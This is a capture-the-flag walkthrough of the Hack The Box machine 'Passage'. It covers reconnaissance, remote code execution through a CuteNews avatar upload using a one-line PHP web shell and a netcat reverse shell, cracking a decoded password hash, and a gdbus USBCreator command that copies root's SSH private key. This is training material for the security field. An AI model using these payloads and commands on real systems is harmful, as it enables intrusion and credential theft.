Passage [HTB] Write-up + custom python-exploit w/o msfconsole
- Name: Passage [Hack the box]
- IP: 10.10.10.206
- OS: Linux
- Difficulty: medium
- Kali Linux-2020.3 (Vmware Workstation)
- Python Script/Php
- gdbus for privilege escalation
Parte One: Enumeration
First of all, Make sure to be connected to the “Hack the box” VPN then we are ready to start nmap
sudo nmap -T4 -sS -A -Pn 10.10.10.206
Cool, there is a web server running on this machine on port 80, fire up firefox and search for http://10.10.10.206/
We landed on the home page, the first News is Implemented Fail2Ban, after too many requests on this website our IP gets a ban. I run Gobuster and I got banned for 2 minutes lol it doesn't lie.
after some research on the website I found out that it is powered by CuteNews CMS, so I searched for the login panel.
I made some research on google about this CMS and I found several vulnerabilities. For example, we can register and automatically log in and change our profile picture.
then you can upload a Php script in image/gif format and you can execute commands on the webserver, so I decided to create a Python script to automate this process.
This python script allows you to register and login inside CuteNews, change the image profile with a PHP script masked as a gif file, and then get inside the machine. Simple right? I took some inspiration from CVE-20199–11447 and now I will explain to you how it works.
You can find my personal code on Github: https://github.com/Andrxid/Passage_HTB_exploit
This is the most important part of the script. To create this function you need the “data” from the website, these are the values required for the user registration. you can find them using a proxy like burp and capture the requests. In this case, it will generate a random password, user, and email.
Log In function
The process of making this is pretty the same for the registration part.
This function takes the PHP script I made and makes the custom settings for our profile, such as the fake profile photo, and get the image link for the user which contains the payload.
The PHP script is very easy, it accepts user input from the link and I added the “GIF8;” to make it acceptable as an image.
<?php system($_REQUEST['cmd']) ?>
moreover, I created two threads with two functions, the bash function that simply calls a netcat listener and the request function that uses a get request at the image link with PHP file to call my netcat listener.
there are also a init function and a run function, you can find out on the Github link.
Part Two: Exploitation
After creating our script we can run it and get inside the machine quickly.
Run the python script and insert the target URL!
the script will ask if we have already an account, in this case, we select no.
it will generate a random one and automatically login to the website and upload our custom PHP script.
to make the connection give the script your IP listener in order to set your listener up and there you go!
To obtain a TTY shell run this command
python3 -c 'import pty;pty.spawn("/bin/bash")';
after some research, I go to the data folder “cdata” that contains: news, users, plugins, btree, backup, log.
in the users' folder, there are many files so let’s cat them all
these are base64 encoded, after a lot of decryption I found something interesting in this one
use this command to decode on your terminal
echo "YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19" | base64 -d
the output seems to be information on Paul coles, Paul is also a user of the machine. There is a password encrypted, I used cyberchef to detect the hash type.
it’s SHA-256. Let’s crack it!
hashcat -m 1400 hash -w rockyou.txt
paul credentials are:
now we are paul and we can read the user.txt.
this part is pretty easy, we can use id_rsa key to log in as nadav in ssh
now we are nadav!!
Part Three: Privilege escalation-root
Ps aux will prompt all running process and we can see that some are under root for example:
root 2388 0.0 0.4 235548 20020 ? Sl 00:25 0:00 /usr/bin/python3 /usr/share/usb-creator/usb-creator-helper
The vulnerability is discussed in details in this post:
use this command in the tmp folder
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/key true
this command will generate the ssh key for root
now copy it and use it to ssh in as root.
Easy man, you obtained the root flag!
If you have any questions or suggestions do not hesitate to contact me